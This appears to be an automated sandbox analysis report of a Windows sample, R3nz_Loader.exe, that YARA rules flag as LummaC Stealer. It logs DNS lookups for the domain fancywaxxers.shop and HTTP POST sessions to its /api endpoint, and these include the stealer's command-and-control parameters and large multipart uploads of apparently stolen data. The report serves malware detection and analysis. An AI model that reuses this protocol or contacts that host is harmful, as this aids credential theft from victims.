                                                                            Dec 29, 2024 23:37:06.476093054 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.476109028 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.910254002 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.910341978 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.911601067 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.911613941 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.911840916 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.913155079 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.913247108 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.913269997 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362348080 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362412930 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362468004 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362498045 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362503052 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.362560987 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362601995 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.362718105 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362744093 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362792015 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.362807989 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362858057 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.367031097 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.367089987 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.367117882 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.367155075 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.367171049 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.367197037 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.367225885 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.367253065 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.369889021 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.369925976 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.369951010 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.369966030 CET44349717104.21.32.1192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 29, 2024 23:36:54.981925964 CET | 65484 | 53 | 192.168.2.5 | 1.1.1.1
Dec 29, 2024 23:36:54.993448973 CET | 53 | 65484 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 29, 2024 23:36:54.981925964 CET | 192.168.2.5 | 1.1.1.1 | 0xd6a | Standard query (0) | fancywaxxers.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 29, 2024 23:36:54.993448973 CET | 1.1.1.1 | 192.168.2.5 | 0xd6a | No error (0) | fancywaxxers.shop | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 23:36:54.993448973 CET | 1.1.1.1 | 192.168.2.5 | 0xd6a | No error (0) | fancywaxxers.shop | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 23:36:54.993448973 CET | 1.1.1.1 | 192.168.2.5 | 0xd6a | No error (0) | fancywaxxers.shop | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 23:36:54.993448973 CET | 1.1.1.1 | 192.168.2.5 | 0xd6a | No error (0) | fancywaxxers.shop | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 23:36:54.993448973 CET | 1.1.1.1 | 192.168.2.5 | 0xd6a | No error (0) | fancywaxxers.shop | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 23:36:54.993448973 CET | 1.1.1.1 | 192.168.2.5 | 0xd6a | No error (0) | fancywaxxers.shop | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Dec 29, 2024 23:36:54.993448973 CET | 1.1.1.1 | 192.168.2.5 | 0xd6a | No error (0) | fancywaxxers.shop | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
• fancywaxxers.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 104.21.32.1 | 443 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-29 22:36:55 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: fancywaxxers.shop
2024-12-29 22:36:55 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-29 22:36:55 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Sun, 29 Dec 2024 22:36:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=cfoef94mejek20all48tqrg0go; expires=Thu, 24 Apr 2025 16:23:34 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lFpFIP5bHkW3ZYbhcWxOeSkS9wdsDNyJi6zv2Jvzt7PzPhugn8IO3Vb2KmxXQ7%2FUWN8XQLjMTj6iXUSx6YilqCfIYdjQFPVSyr2q8h%2BQb41ITrklneucK87Uqij5v4%2Bdj8pnIA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f9d458f4f2972b9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1780&rtt_var=682&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1587819&cwnd=214&unsent_bytes=0&cid=a4afd12f97268890&ts=483&x=0"
2024-12-29 22:36:55 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-29 22:36:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 104.21.32.1 | 443 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-29 22:36:56 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 53
Host: fancywaxxers.shop
2024-12-29 22:36:56 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 79 6f 75 6e 67 65 73 73 74 74 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@youngesstt&j=
2024-12-29 22:36:56 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Sun, 29 Dec 2024 22:36:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=c410gflpvtm3rhp660ue0gk7c7; expires=Thu, 24 Apr 2025 16:23:35 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8E7tkbgjqg6TNIPFyyD7oMuazrRF4QwU6%2FLkmocqhqkao1axujqcmGnt7gj1oir4w3J36Y95waclQpBEphIzksWVbwFaGeKcsiwYrdE%2FYmONiItbmO58lPTfAPPI%2FVmArTM2sg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f9d4595be8e72b9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1794&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=954&delivery_rate=1599123&cwnd=214&unsent_bytes=0&cid=83dc1eadcdec0beb&ts=467&x=0"


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.549707104.21.32.14435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-29 22:36:57 UTC280OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=AMTB3QLKBFJ98IV
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 12823
                                                                            Host: fancywaxxers.shop
                                                                            2024-12-29 22:36:57 UTC | 12823 | OUT | Data Raw: (hex dump omitted; ASCII rendering follows)
                                                                            Data Ascii:
                                                                            --AMTB3QLKBFJ98IV
                                                                            Content-Disposition: form-data; name="hwid"

                                                                            EBC37E2E97F52F5C1B825E506F021727
                                                                            --AMTB3QLKBFJ98IV
                                                                            Content-Disposition: form-data; name="pid"

                                                                            2
                                                                            --AMTB3QLKBFJ98IV
                                                                            Content-Disposition: form-data; name="lid"

                                                                            BVnUqo--@youngesstt
                                                                            -
                                                                            2024-12-29 22:36:58 UTC | 1140 | IN | HTTP/1.1 200 OK
                                                                            Date: Sun, 29 Dec 2024 22:36:58 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=l00ti5jrad54fvcl185si0tf9a; expires=Thu, 24 Apr 2025 16:23:37 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n1rAsGP3Tfs78vviTJWDhBhkuJefgOmSXbOaOchdV6V1CTOIyzPc1yvSzJP13cxL5iP7CP4Wijc%2BxTN%2BB%2FAagb%2FhWQYD7c%2BVXlQniG%2FDRmRt%2B9anlnP3YBgFWhr4ipZuGZM3KA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f9d459e6a5c41a6-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1530&rtt_var=598&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13761&delivery_rate=1792510&cwnd=239&unsent_bytes=0&cid=3fa5ff3a1c8bde50&ts=611&x=0"
                                                                            2024-12-29 22:36:58 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: f\r\nok 8.46.123.189\r\n
                                                                            2024-12-29 22:36:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0\r\n\r\n


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            3 | 192.168.2.5 | 49709 | 104.21.32.14 | 443 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-12-29 22:36:59 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=7E5OXTHN8747P
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 15053
                                                                            Host: fancywaxxers.shop
                                                                            2024-12-29 22:36:59 UTC | 15053 | OUT | Data Raw: (hex dump omitted; ASCII rendering follows)
                                                                            Data Ascii:
                                                                            --7E5OXTHN8747P
                                                                            Content-Disposition: form-data; name="hwid"

                                                                            EBC37E2E97F52F5C1B825E506F021727
                                                                            --7E5OXTHN8747P
                                                                            Content-Disposition: form-data; name="pid"

                                                                            2
                                                                            --7E5OXTHN8747P
                                                                            Content-Disposition: form-data; name="lid"

                                                                            BVnUqo--@youngesstt
                                                                            --7E5OX
                                                                            2024-12-29 22:36:59 UTC | 1140 | IN | HTTP/1.1 200 OK
                                                                            Date: Sun, 29 Dec 2024 22:36:59 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=ss5b5uhrknf899ugqlct5n9otp; expires=Thu, 24 Apr 2025 16:23:38 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jBI4IlrwpzZGWpLA3OFUKCuj1hw6cfvnqidjR2LMgTRQk5UCBicWH%2BJlCk%2FU15I%2Bh%2B%2BvFRQRty5E3FdtnlZaQK86w4viH%2BL9dN4WMjjRRnrIb4gG0mP5TGN7jY%2BYAvXEaeJIBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f9d45a60bccc327-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1673&rtt_var=836&sent=10&recv=20&lost=0&retrans=1&sent_bytes=4228&recv_bytes=15989&delivery_rate=257246&cwnd=189&unsent_bytes=0&cid=c669fef1783b94ff&ts=501&x=0"
                                                                            2024-12-29 22:36:59 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: f\r\nok 8.46.123.189\r\n
                                                                            2024-12-29 22:36:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0\r\n\r\n


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            4 | 192.168.2.5 | 49714 | 104.21.32.14 | 443 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-12-29 22:37:00 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=CVKA9J29E8AUJ7
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 20549
                                                                            Host: fancywaxxers.shop
                                                                            2024-12-29 22:37:00 UTC | 15331 | OUT | Data Raw: (hex dump omitted; ASCII rendering follows)
                                                                            Data Ascii:
                                                                            --CVKA9J29E8AUJ7
                                                                            Content-Disposition: form-data; name="hwid"

                                                                            EBC37E2E97F52F5C1B825E506F021727
                                                                            --CVKA9J29E8AUJ7
                                                                            Content-Disposition: form-data; name="pid"

                                                                            3
                                                                            --CVKA9J29E8AUJ7
                                                                            Content-Disposition: form-data; name="lid"

                                                                            BVnUqo--@youngesstt
                                                                            --CV
                                                                            2024-12-29 22:37:00 UTC | 5218 | OUT | Data Raw: (binary body chunk omitted)
                                                                            2024-12-29 22:37:01 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                            Date: Sun, 29 Dec 2024 22:37:01 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=p3itkkf29qdaaq58tc7onscb4p; expires=Thu, 24 Apr 2025 16:23:40 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K1gNe8Z50xQhy4U8N0h4mSelIgydnz7G8ClZZixiuyXiz4QxnMqlTGRGdm8XeYorYppPYOynTKmpbAEjFzZoer0fGvaoKo6B%2BbAmUmYzFrqI72ftDbrKBZDSeD%2Fql%2FbNtMgTYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f9d45b0ac684344-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1709&rtt_var=658&sent=9&recv=26&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21508&delivery_rate=1643218&cwnd=47&unsent_bytes=0&cid=7163c82a0152d0e1&ts=639&x=0"
                                                                            2024-12-29 22:37:01 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: f\r\nok 8.46.123.189\r\n
                                                                            2024-12-29 22:37:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0\r\n\r\n


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            5 | 192.168.2.5 | 49715 | 104.21.32.14 | 443 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-12-29 22:37:02 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=4H4JHYC6MWK5EZIZ
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 1280
                                                                            Host: fancywaxxers.shop
                                                                            2024-12-29 22:37:02 UTC | 1280 | OUT | Data Raw: (hex dump omitted; ASCII rendering follows)
                                                                            Data Ascii:
                                                                            --4H4JHYC6MWK5EZIZ
                                                                            Content-Disposition: form-data; name="hwid"

                                                                            EBC37E2E97F52F5C1B825E506F021727
                                                                            --4H4JHYC6MWK5EZIZ
                                                                            Content-Disposition: form-data; name="pid"

                                                                            1
                                                                            --4H4JHYC6MWK5EZIZ
                                                                            Content-Disposition: form-data; name="lid"

                                                                            BVnUqo--@youngesstt
                                                                            2024-12-29 22:37:03 UTC | 1132 | IN | HTTP/1.1 200 OK
                                                                            Date: Sun, 29 Dec 2024 22:37:03 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=19oi9fbrtnetd8fdi2t64u3b8e; expires=Thu, 24 Apr 2025 16:23:41 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ol6xC3nRV8fKhYVRu%2B1%2FK%2FOlhDRtXaq%2FEcP7rCBO8o5VHyluvz1dHLCWyilsAlaFwefEl1Gm3J9bvLWOwN3uBkZ8r2BOAzVXueAanxECfCgu6ac51SfuZocCGHo8VMCNvVlRBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f9d45ba4c0b1875-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1631&rtt_var=624&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2196&delivery_rate=1737061&cwnd=153&unsent_bytes=0&cid=5a9da72fe1c9aaa8&ts=706&x=0"
                                                                            2024-12-29 22:37:03 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: f\r\nok 8.46.123.189\r\n
                                                                            2024-12-29 22:37:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0\r\n\r\n


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            6 | 192.168.2.5 | 49716 | 104.21.32.14 | 443 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-12-29 22:37:04 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=L5A4SY5A1OSHVBRM0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 586242
                                                                            Host: fancywaxxers.shop
                                                                            2024-12-29 22:37:04 UTC | 15331 | OUT | Data Raw: (hex dump omitted; ASCII rendering follows)
                                                                            Data Ascii:
                                                                            --L5A4SY5A1OSHVBRM0
                                                                            Content-Disposition: form-data; name="hwid"

                                                                            EBC37E2E97F52F5C1B825E506F021727
                                                                            --L5A4SY5A1OSHVBRM0
                                                                            Content-Disposition: form-data; name="pid"

                                                                            1
                                                                            --L5A4SY5A1OSHVBRM0
                                                                            Content-Disposition: form-data; name="lid"

                                                                            BVnUqo--@younges
                                                                            2024-12-29 22:37:04 UTC | 15331 | OUT | Data Raw: (nine further 15331-byte binary body chunks omitted)
                                                                            2024-12-29 22:37:06 UTC  1136  IN  HTTP/1.1 200 OK
                                                                            Date: Sun, 29 Dec 2024 22:37:06 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=jnu1crie07dno73a36mainpr5f; expires=Thu, 24 Apr 2025 16:23:44 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4L1mUBaJ4CBOGikBS0ZzUONv4oi77eXqw%2Bi4tXZYGeQ9F98yuLvKNWWG3TrPfek8mi9zWwNrLRH05gvExmk2b40IncLEW%2F256KwbWSgcj03xyagWbkkTKeRA9Nek%2Fcj6UXZlkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f9d45c6bf754344-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1715&rtt_var=677&sent=327&recv=603&lost=0&retrans=0&sent_bytes=2844&recv_bytes=588833&delivery_rate=1702623&cwnd=47&unsent_bytes=0&cid=41510f8b1eed9a91&ts=2113&x=0"


                                                                            Session ID:7
                                                                            Source IP:192.168.2.5
                                                                            Source Port:49717
                                                                            Destination IP:104.21.32.144
                                                                            Destination Port:443
                                                                            PID:5780
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                            2024-12-29 22:37:06 UTC  265  OUT  POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 88
                                                                            Host: fancywaxxers.shop
                                                                            2024-12-29 22:37:06 UTC  88  OUT  Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@youngesstt&j=&hwid=EBC37E2E97F52F5C1B825E506F021727
                                                                            2024-12-29 22:37:07 UTC  1124  IN  HTTP/1.1 200 OK
                                                                            Date: Sun, 29 Dec 2024 22:37:07 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=eenu7mt19ktadvsurafsbt6f1c; expires=Thu, 24 Apr 2025 16:23:46 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QqFoG2wlTd3qKRv7IJ7ZpGCMIKzBkTl789nFG6NhM0YWIvD9vK4jw2bO3AV1iZvxT47CYkPZGUjg7XSZqcqAWcucjaUFRt6MjqT4%2FGUN10ZpqnHXP4bnn2STZMZ3SB7fHSDWUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f9d45d6aced4344-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1790&rtt_var=675&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=989&delivery_rate=1615938&cwnd=47&unsent_bytes=0&cid=e358544b2b3310f0&ts=456&x=0"



                                                                            Target ID:0
                                                                            Start time:17:36:53
                                                                            Start date:29/12/2024
                                                                            Path:C:\Users\user\Desktop\R3nz_Loader.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\R3nz_Loader.exe"
                                                                            Imagebase:0xa10000
                                                                            File size:706'048 bytes
                                                                            MD5 hash:B43D8ECA7777B170DDC40A824AB10BB6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
